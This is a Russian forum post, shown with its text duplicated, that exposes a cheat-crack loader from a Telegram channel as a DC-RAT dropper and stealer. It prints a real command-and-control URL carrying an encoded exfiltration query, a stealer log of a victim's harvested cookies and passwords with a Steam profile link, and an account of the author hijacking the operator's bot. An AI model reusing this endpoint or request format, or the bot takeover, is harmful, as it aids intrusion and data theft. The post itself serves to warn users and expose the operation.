Разработчик
-
Автор темы
- #1
Всем шалом!
На релиз этой статьи меня спровоцировал один старый знакомый aka QHide, aka Africanew, aka SoDidYouDo, aka pafipib377, который много чего возомнил о себе. Набрав аудиторию школьников в телеграм канале Bat Crack он предоставляет им лоадер, полный малварщины с кряками читов, считая себя кем-то вроде Робин Гуда из мира читеров.
Многие, нося розовые очки действительно верят этому человеку, даже не подозревая сколько логов данный товарищ успел собрать.
Все сдампленные файлы я оставлю тут:
Начнем
1. Лоадер / Дроппер
Лоадер накрытый фулл-пресетом вмпротекта никак не помог нашему другу скрыть наличие дроппера, поскольку VirusTotal всегда видит дочерние подпроцессы.
У него есть несколько дочерних процессов, которые написаны на .NET, что отсылает нас к DC-Rat. И первым делом лоадер дроппает процесс с названием "eQQVZ0gJ1fKEYJw.exe", который делает HTTP-Запрос угадайте куда? Правильно, на GitHub репозиторий! То есть, человек на протяжении столького времени так и не научился прятать паблик репозитории, и со времен первого малваря под видом крякми на синем форуме он по прежнему оставляет важные файлы на репозитории. Вот это уровень, конечно :D
Также у нас есть резервные страницы с веб-архива на случай, если кухайд удалит репозитории:
Пруф того, что файлы принадлежат ему:
2. Что за файлы в репозитории?
Все эти файлы в папках не рекомендуется к запуску, поскольку все они являются вирусами удаленного доступа и стиллерами.
Рассмотрим самый интерес запрос, которые эти файлы отправляют на сервер
Запрос:
В файле __lowserverTestlocal.php хранится информация о том, какие у нас есть аккаунты.
Опрометчиво в сотый раз использовать sqlite, но кто я такой, чтобы учить его писать малвари правильно?
3. Вирус удалённого доступа / DC-RAT
По анализу репорта на any.run, ратник кухайда постоянно клонирует себя под разными именами и в разных папках
В основном для сбора информации выступают два процесса: ComcontainerWeb.exe и IMEDICTUPDATE.exe, первый процесс дроппает второй, и второй начинает собирать информацию о юзере, фотографируя монитор.
Второй процесс any.run сразу же распознал за DC-RAT
Ссылка на фулл-репорты я оставляю тут:
4. Взлом бота / Прямые пруфы ратника
Наш товарищ не отличился умом и пропалил токен бота в своих запросах, в следствии чего мы взломали его на раз-два. Бот много спамил логгами юзерами, которые запускали его чудо-лоадер.
Очень интересно QHide сможет оправдаться за эти скрины, но думаю, что он скажет как обычно "Ребята, это не я, это же фейк и фотошоп!!" :)
Содержимое WorkLog со скриншота:
(Не воруй мои аккаунты NordVPN, которые ты так яростно ищешь, пожалуйста)
А вот лоадер триггернулся на ренейм исполняемого файла и сразу же заскринил монитор :)
5. Заключение
На момент конца лета 2022 мой старый знакомый так и не смог поумнеть, он по прежнему распространяет свои недомалвари, конечно я впечатлён тем, что он собрал так много школьников, сам он очень много логов собрал, особенно это было заметно когда бот часто спамил о юзерах. Да, сама статья вышла короткой, но основные пруфы я предоставил, у меня ещё много информации есть :)
Надеемся всей командой, что человек рано или поздно одумается и прекратит продавать логи на зелёном форуме через своего друга, найдя легитимные методы заработка денег!
Мой блог:
Блог моей команды:
Credits: digix
На релиз этой статьи меня спровоцировал один старый знакомый aka QHide, aka Africanew, aka SoDidYouDo, aka pafipib377, который много чего возомнил о себе. Набрав аудиторию школьников в телеграм канале Bat Crack он предоставляет им лоадер, полный малварщины с кряками читов, считая себя кем-то вроде Робин Гуда из мира читеров.
Многие, нося розовые очки действительно верят этому человеку, даже не подозревая сколько логов данный товарищ успел собрать.
Все сдампленные файлы я оставлю тут:
Пожалуйста, авторизуйтесь для просмотра ссылки.
Начнем
1. Лоадер / Дроппер
Лоадер накрытый фулл-пресетом вмпротекта никак не помог нашему другу скрыть наличие дроппера, поскольку VirusTotal всегда видит дочерние подпроцессы.
У него есть несколько дочерних процессов, которые написаны на .NET, что отсылает нас к DC-Rat. И первым делом лоадер дроппает процесс с названием "eQQVZ0gJ1fKEYJw.exe", который делает HTTP-Запрос угадайте куда? Правильно, на GitHub репозиторий! То есть, человек на протяжении столького времени так и не научился прятать паблик репозитории, и со времен первого малваря под видом крякми на синем форуме он по прежнему оставляет важные файлы на репозитории. Вот это уровень, конечно :D
Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.
Также у нас есть резервные страницы с веб-архива на случай, если кухайд удалит репозитории:
Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.
Пруф того, что файлы принадлежат ему:
2. Что за файлы в репозитории?
Все эти файлы в папках не рекомендуется к запуску, поскольку все они являются вирусами удаленного доступа и стиллерами.
Рассмотрим самый интерес запрос, которые эти файлы отправляют на сервер
Пожалуйста, авторизуйтесь для просмотра ссылки.
Запрос:
Код:
http://188.120.228.186/Dump/2Windowslow6/baseSqlvideojavascript/CentralLongpollEternal/1pollprivateserver/cpu8game/Imagetestimagedle/Temp/_lowserverTestlocal.php?6BTE=nb&53f1ee05f910dcca7b05bb6b8729804a=wN4E2MmFGNjlTYjBzN1MmY4EWM2cjMlhDN2MWO0EWMkZWZ1EWMzQWO1YDM5ITN1gjNyITN1MzM&868ab25e2f6dcdf7c643d6622cc3ad1d=QN2UWOxcDM5YmNmZDZjNGZmNmN1cDNxEGN0YjMjFzYlRDM0EmMyIjZ&014cbe5312180d7cf6093d1c6507aa60=d1nIlhDZhF2YlVDOyM2YmJzM4EGOzUjZlFGNlZTM5IGZmZ2Y4QzNkhDZ5IiOiI2M2QmN2ADO5IGOldjYhBDZwgTYmVmNhlTZygTYkVmNiwiIxQWOxEzY2cTYmZTMkR2NyUWMmVTOwIjZiRDN2czYyMDM5MGMlBTN1IiOiI2N3IDO3MGM3UjZ2gTMzUTYhFDO5cDM4QmYzQDZkJWZis3W&118a4f9d9e34838d2ee3e43e595134b6=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Опрометчиво в сотый раз использовать sqlite, но кто я такой, чтобы учить его писать малвари правильно?
3. Вирус удалённого доступа / DC-RAT
По анализу репорта на any.run, ратник кухайда постоянно клонирует себя под разными именами и в разных папках
В основном для сбора информации выступают два процесса: ComcontainerWeb.exe и IMEDICTUPDATE.exe, первый процесс дроппает второй, и второй начинает собирать информацию о юзере, фотографируя монитор.
Второй процесс any.run сразу же распознал за DC-RAT
Ссылка на фулл-репорты я оставляю тут:
Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.
4. Взлом бота / Прямые пруфы ратника
Наш товарищ не отличился умом и пропалил токен бота в своих запросах, в следствии чего мы взломали его на раз-два. Бот много спамил логгами юзерами, которые запускали его чудо-лоадер.
Очень интересно QHide сможет оправдаться за эти скрины, но думаю, что он скажет как обычно "Ребята, это не я, это же фейк и фотошоп!!" :)
Содержимое WorkLog со скриншота:
Код:
[Clipboard] Saving information...
[Plugin] Invoke: 12904126 (IZxhEekEFnBJmlplgs, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 5875925 (FJb2V, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 4702976 (OBSGrabber, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 63835064 (VPNGrabber, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 60900694 (UBpr8pbEuGqlxeix, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null)
[Plugin] Invoke: 57174929 (8PjL4j9p1T4HRGW6, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null)
[SystemInfromation] Saving information...
[Screenshot] Saving screenshots from 2 monitor's:
-\\.\DISPLAY1
-\\.\DISPLAY2
Work results:
-[ScannedPaths]: C:\Users\
-[ScannedElements]: 62832
-[CookiesCount]: 2146
-[CookiesDBCount]: 7
-[PasswordsCount]: 96
-[PasswordsDBCount]: 2
-[FormsCount]: 920
-[FormsDBCount]: 2
-[CCCount]: 0
-[CCDBCount]: 0
-[DiscordTokensCount]: 1
-[SteamProfileURL]: https://steamcommunity.com/profiles/76561199376657190
-[HasCryptoWallet]: N
-[CollectedFilesCount]: 0
-[CollectedFilesPatterns]:
-[HasVPN]: N
Saving log...А вот лоадер триггернулся на ренейм исполняемого файла и сразу же заскринил монитор :)
5. Заключение
На момент конца лета 2022 мой старый знакомый так и не смог поумнеть, он по прежнему распространяет свои недомалвари, конечно я впечатлён тем, что он собрал так много школьников, сам он очень много логов собрал, особенно это было заметно когда бот часто спамил о юзерах. Да, сама статья вышла короткой, но основные пруфы я предоставил, у меня ещё много информации есть :)
Надеемся всей командой, что человек рано или поздно одумается и прекратит продавать логи на зелёном форуме через своего друга, найдя легитимные методы заработка денег!
Мой блог:
Пожалуйста, авторизуйтесь для просмотра ссылки.
Блог моей команды:
Пожалуйста, авторизуйтесь для просмотра ссылки.
Credits: digix
Последнее редактирование:
.
